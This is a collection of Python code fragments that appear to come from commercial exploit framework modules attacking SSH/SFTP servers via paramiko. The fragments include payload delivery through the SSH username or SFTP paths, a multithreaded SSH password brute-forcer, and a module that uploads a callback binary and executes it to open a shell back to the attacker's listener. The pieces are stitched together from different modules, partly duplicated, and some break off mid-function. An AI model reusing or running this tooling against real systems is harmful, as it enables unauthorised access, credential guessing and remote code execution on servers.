def open_ssh_transport(self, sock): t = paramiko.Transport(sock) try: t.connect() except paramiko.SSHException, e: if "Error reading SSH protocol" in str(e): self.log("[D2] Connection has been overwhelmed (or is not SSH!)") t.close() self.log("[D2] Thread sleeping to let server recover") time.sleep(120) return None
def test_ssh_server(self): self.log('[D2] Test SSH server on %s' % self.host) sock = self.connect_to_host() if sock == None: return 1 t = paramiko.Transport(sock) try: t.connect() except paramiko.SSHException, e: if "Error reading SSH protocol" in str(e): self.log("[D2] Connection has been overwhelmed (or is not SSH!)") t.close() return 1
def do_sftp(self, arg): """\nSend a file by SSH protocol\n""" args = arg.split() if len(args) != 6: print "Usage: sftp [put|get] <host:port> <user> <pass> <src file> <dest file>\n" return method = args[0] if method != "put" and method != "get": print "Invalid method: only put or get valid method\n" return host = args[1].split(":")[0] port = int(args[1].split(":")[1]) user = args[2] passwd = args[3] src = args[4] dest = args[5] #paramiko_log_file = "paramiko.log" #paramiko.util.log_to_file(paramiko_log_file) if not os.path.exists(src): print "Source file %s not found !\n" % src return try: t = paramiko.Transport((host, port)) t.connect(username=user, password=passwd) sftp = paramiko.SFTPClient.from_transport(t) if method == "put": sftp.put(src, dest) if method == "get": sftp.get(src, dest) except: traceback.print_exc() return try: t.close() except: pass #os.unlink(paramiko_log_file) return
def run(self): self.getArgs() if self.version == 0: self.log("WP> Autoversioning failed.") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 payload = self.makesploit() self.result_error = 0 try: self.s = self.gettcpsock() self.s.connect((self.host, self.port)) except: self.log("WP> Attack reported no open socket - service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 try: self.log("WP> Setting up SSH transport") self.transport = paramiko.Transport(self.s) except: self.log("WP> Transport failed") return 0 self.log("WP> Sending Exploit") try: self.transport.connect(username=payload, password=self.password) time.sleep(2) self.transport.close() except: ignore = '' time.sleep(5) if self.result_error == 0: ret = self.wp_postExploitShellcode(s) if ret: return ret ret = self.ISucceeded() self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return ret
def connect_to_host(self): self.s=self.gettcpsock() try: self.log( "Connecting.....") self.s.connect((self.host,self.port)) self.log( "Done") except socket.error: self.log("Cannot connect to target on port %d"%(self.port)) return 0 #paramiko.util.log_to_file('./para.logs') try: self.log("Setting up SSH transport") self.transport=paramiko.Transport(self.s) except Exception, err: #transport.close() self.log( "transport failed: %s"%(err)) return 0
def run(self): self.getArgs() if self.version == 0: self.log("WP> Autoversioning failed.") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 payload = self.makesploit() self.result_error = 0 try: self.s = self.gettcpsock() self.s.connect((self.host, self.port)) except: self.log("WP> Attack reported no open socket - service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 try: self.log("WP> Setting up SSH transport") self.transport = paramiko.Transport(self.s) except: self.log("WP> Transport failed") return 0 try: self.log("WP> Authenticating (%s:%s)" % (self.user, self.password)) self.transport.connect(username=self.user, password=self.password) self.ssh_version = self.transport.remote_version except: self.log( "WP> Authentication failed - if credentials valid rerun exploit" ) self.transport.close() self.s.close() return 0 try: sftp_ch = paramiko.SFTPClient.from_transport(self.transport) except: self.log( "WP> Authentication failed - if credentials valid rerun exploit" ) self.transport.close() self.s.close() return 0 try: content = sftp_ch.listdir(".") except: self.log( "WP> Authentication Failed - if credentials valid rerun exploit" ) self.transport.close() self.s.close() return 0 self.log("WP> Authentication Complete") self.log("WP> Sending Exploit") try: sftp_ch.listdir(payload) except: self.log( "WP> SSH Transport returned error on send - rerun exploit if payload not successful" ) time.sleep(3) self.transport.close() self.s.close() # Check if follow up is required for some shellcodes if self.result_error == 0: ret = self.wp_postExploitShellcode() if ret: return ret ret = self.ISucceeded() self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return ret
def run_in_thread(self): """ Each thread makes connections and tries passwords """ password = "******" #six is default so we do one less max_tries_per_connect = 5 no_more_passwords = False while password != None or self.done == False: if self.state == self.HALT: self.log("Thread halting.") return if self.done: break sock = self.gettcpsock() try: sock.connect((self.host, self.port)) except socket.error: self.log("Failed to connect to %s:%d" % (self.host, self.port)) self.log("Ending this thread.") self.connections_failing = True return t = paramiko.Transport(sock) try: t.connect() except paramiko.SSHException, msg: self.log("%s is not the password: %s" % (password, msg)) if "Error reading SSH protocol" in str(msg): self.log( "Connection has been overwhelmed (or is not SSH!)") t.close() del t self.log("Thread sleeping to let server recover") #you have to sleep for an ungodly time here. time.sleep(120) continue for i in xrange(0, max_tries_per_connect): self.mylock.acquire() try: password = self.passwords.next() except StopIteration: no_more_passwords = True self.mylock.release() if no_more_passwords: self.done = True return try: self.log("Trying %s:%s" % (self.user, password)) t.auth_password(username=self.user, password=password) #we got a "Bad auth" message from the server except paramiko.SSHException, msg: self.log("SSH Exception: %s" % msg) else: self.log("Found password: %s" % password) self.found_password = password self.done = True if self.full_close: t.close() else: del t return
class theexploit(canvasexploit): def __init__(self): canvasexploit.__init__(self) self.name = NAME self.host = "" self.port = 22 self.cbackport = 5555 self.user = "" self.passwd = "" self.version = 0 self.dest = "" self.rsakey = "" self.dsakey = "" def getargs(self): self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.version = int(self.argsDict.get("version", self.version)) self.cbackport = int(self.argsDict.get("cback_port", self.cbackport)) self.user = self.argsDict.get("user", self.user) self.passwd = self.argsDict.get("passwd", self.passwd) self.rsakey = self.argsDict.get("rsakey", self.rsakey) self.dsakey = self.argsDict.get("dsakey", self.dsakey) self.dest = self.argsDict.get("dest", self.dest) def make_auth(self, t): if not self.user: self.log("You must specify an user !") return 1 if self.user and self.passwd: t.auth_password(username=self.user, password=self.passwd) if not t.is_authenticated(): self.log("Authentication failed !") t.close() return 1 elif self.rsakey: try: key = paramiko.RSAKey.from_private_key_file(self.rsakey) except paramiko.PasswordRequiredException: self.log("Password required !") return t.auth_publickey(self.user, key) elif self.dsakey: try: key = paramiko.DSSKey.from_private_key_file(self.dsakey) except paramiko.PasswordRequiredException: self.log("Password required !") return t.auth_publickey(self.user, key) else: self.log( "Error with authentication parameters (user, passwd, rsa key or dsa key)" ) return 1 return 0 def run(self): self.getargs() self.setInfo("%s (in progress)" % (NAME)) interface = self.engine.get_callback_interface() if self.version == 0: self.callback = self.engine.start_listener(interface, LINUXMOSDEF, self.cbackport) if self.version == 1: self.callback = self.engine.start_listener(interface, SOLARISMOSDEF_INTEL, self.cbackport) if self.version == 2: self.callback = self.engine.start_listener(interface, SOLARISSPARCMOSDEF, self.cbackport) if self.version == 3: self.callback = self.engine.start_listener(interface, FREEBSDMOSDEF, self.cbackport) if self.version == 4: self.callback = self.engine.start_listener(interface, AIXMOSDEF_52_PPC, self.cbackport) if self.callback == 0: return 0 if not self.dest: self.log("Desination file not specified") self.setInfo("%s (failed)" % (NAME)) return 0 bin = TARGETS[self.version][1] try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.host, self.port)) except Exception, e: self.log("Connect failed: %s" % str(e)) return 0 t = paramiko.Transport(sock) try: t.start_client() except paramiko.SSHException: self.log("SSH negotiation failed") return 0 try: i = self.make_auth(t) if i == 1: return 0 #t.connect(username=self.user, password=self.passwd) sftp = paramiko.SFTPClient.from_transport(t) sftp.put("3rdparty/D2SEC/exploits/d2sec_sshmosdef/%s" % bin, self.dest) sftp.close() except: self.log("Can't upload cback binary") self.setInfo("%s (failed)" % (NAME)) return 0 try: t.close() except: pass try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.host, self.port)) except Exception, e: self.log("Connect failed: %s" % str(e)) return 0
self.setInfo("%s (failed)" % (NAME)) return 0 try: t.close() except: pass try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.host, self.port)) except Exception, e: self.log("Connect failed: %s" % str(e)) return 0 t = paramiko.Transport(sock) try: t.start_client() except paramiko.SSHException: self.log("SSH negotiation failed") return 0 try: self.make_auth(t) chan = t.open_session() chan.exec_command( "chmod 755 %s; %s %s %d" % (self.dest, self.dest, interface, self.cbackport)) chan.close() except: